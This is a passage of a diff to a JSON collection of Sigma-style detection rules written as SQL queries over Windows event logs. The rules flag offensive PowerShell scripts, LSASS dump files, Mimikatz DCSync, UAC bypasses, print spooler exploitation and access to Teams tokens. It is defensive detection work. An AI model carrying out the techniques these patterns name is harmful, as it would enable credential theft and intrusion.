ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename 
LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" ], - "filename": "file_event_win_powershell_exploit_scripts.yml" + "filename": "win_security_susp_dsrm_password_change.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile - File", - "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", - "status": "experimental", - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Denied Access To Remote Desktop", + "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", + "status": "test", + "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", + "author": "Pushkarev Dmitry", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Valid user was not added to RDP group" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = 
'4825')" ], - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" + "filename": "win_security_not_allowed_rdp_access.yml" }, { - "title": "Potential Winnti Dropper Activity", - "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "title": "First Time Seen Remote Named Pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", "status": "test", - "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\')" + "attack.lateral_movement", + "attack.t1021.002" ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml" - }, - { - "title": "WScript or CScript Dropper - File", - "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", - "status": "experimental", - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "author": "Tim Shelton", "falsepositives": [ - "Unknown" + "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR 
TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" ], - "filename": "file_event_win_cscript_wscript_dropper.yml" + "filename": "win_security_lm_namedpipe.yml" }, { - "title": "Potential Persistence Via Notepad++ Plugins", - "id": "54127bd4-f541-4ac3-afdb-ea073f63f692", - "status": "experimental", - "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". 
Which could indicates possible persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious LDAP-Attributes Used", + "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "status": "test", + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "author": "xknow @xknow_infosec", "tags": [ - "attack.persistence" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Possible FPs during first installation of Notepad++", - "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" + "Companies, who may use these default LDAP-Attributes for personal information" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\target.exe' ESCAPE '\\' OR NewProcessName LIKE '%Installer.x64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" ], - "filename": "file_event_win_notepad_plus_plus_persistence.yml" + "filename": "win_security_susp_ldap_dataexchange.yml" }, { - "title": "PSEXEC Remote Execution File Artefact", - "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", - "status": "experimental", - "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. 
It gets written to the file system and will be recorded in the USN Journal on the target system", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Hacktool Ruler", + "id": "24549159-ac1b-479c-8175-d42aea947cae", + "status": "test", + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", + "attack.discovery", "attack.execution", - "attack.persistence", - "attack.t1136.002", - "attack.t1543.003", - "attack.t1570", - "attack.s0029" + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" ], "falsepositives": [ - "Unlikely" + "Go utilities that use staaldraad awesome NTLM library" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" ], - "filename": "file_event_win_psexec_service_key.yml" + "filename": "win_security_alert_ruler.yml" }, { - "title": "Suspicious VHD Image Download From Browser", - "id": "8468111a-ef07-4654-903b-b863a80bbc95", - "status": "test", - "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "id": "8fe1c584-ee61-444b-be21-e9054b229694", + "status": "experimental", + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "author": "INIT_6", "tags": [ - "attack.resource_development", - "attack.t1587.001" + 
"attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Legitimate user creation" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" ], - "filename": "file_event_win_mal_vhd_download.yml" + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" }, { - "title": "PCRE.NET Package Temp Files", - "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", "status": "test", - "description": "Detects processes creating temp files related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in 
scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "author": "@neu5ron", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" ], - "filename": "file_event_win_pcre_net_temp_file.yml" + "filename": "win_security_disable_event_logging.yml" }, { - "title": "Moriya Rootkit", - "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "status": "test", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" ], - "filename": "file_event_win_moriya_rootkit.yml" + "filename": "win_security_susp_rottenpotato.yml" }, { - "title": "Drop Binaries Into Spool Drivers Color Folder", - "id": 
"ce7066a6-508a-42d3-995b-2952c65dc2ce", + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "status": "experimental", - "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Mimikatz DC sync security events", + "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_spool_drivers_color_drop.yml" + "filename": "win_security_dcsync.yml" }, { - "title": "Publisher Attachment File Dropped In Suspicious Location", - "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", - "status": 
"experimental", - "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Sessions Network Connections (WinRM)", + "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "status": "test", + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of \".pub\" files from those locations" + "Legitimate use of remote PowerShell execution" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" ], - "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" + "filename": "win_security_remote_powershell_session.yml" }, { - "title": "ScreenConnect Temporary Installation Artefact", - "id": "fec96f39-988b-4586-b746-b93d59fd1922", + "title": "Defrag Deactivation - Security", + "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application 
control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1053", + "attack.s0111" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4701' AND TaskName LIKE '\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" ], - "filename": "file_event_win_screenconnect_artefact.yml" + "filename": "win_security_apt_slingshot.yml" }, { - "title": "LSASS Process Memory Dump Files", - "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "title": "Invoke-Obfuscation STDIN+ Launcher - Security", + "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "status": "experimental", - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_dump.yml" + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" }, { - "title": "Potential Initial Access via DLL Search Order Hijacking", - "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "title": "Suspicious Teams Application Related ObjectAcess Event", + "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "status": "experimental", - "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. 
This may indicate an attempt to load a malicious module via DLL search order hijacking.", - "author": "Tim Rauch (rule), Elastic (idea)", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1574", - "attack.t1574.001", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' 
ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" + "filename": "win_security_teams_suspicious_objectaccess.yml" }, { - "title": "Suspicious desktop.ini Action", - "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "status": "test", - "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. 
renaming files) without changing them on disk.", - "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Operations performed through Windows SCCM or equivalent", - "Read only access list authority" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE 